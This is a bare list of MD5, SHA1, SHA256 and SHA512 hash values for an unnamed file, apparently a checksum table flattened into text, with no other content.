MD5ec41f740797d2253dc1902e71941bbdb
SHA1407b75f07cb205fee94c4c6261641bd40c2c28e9
SHA25647425ebf3dd905bbfea15a7667662aa6ce3d2deba4b48dfbe646ce9d06f43520
SHA512e544348e86cee7572a6f12827368d5377d66194a006621d4414ef7e0f2050826d32967b4374dfbcdecda027011c95d2044bd7c461db23fad639f9922b92a6d33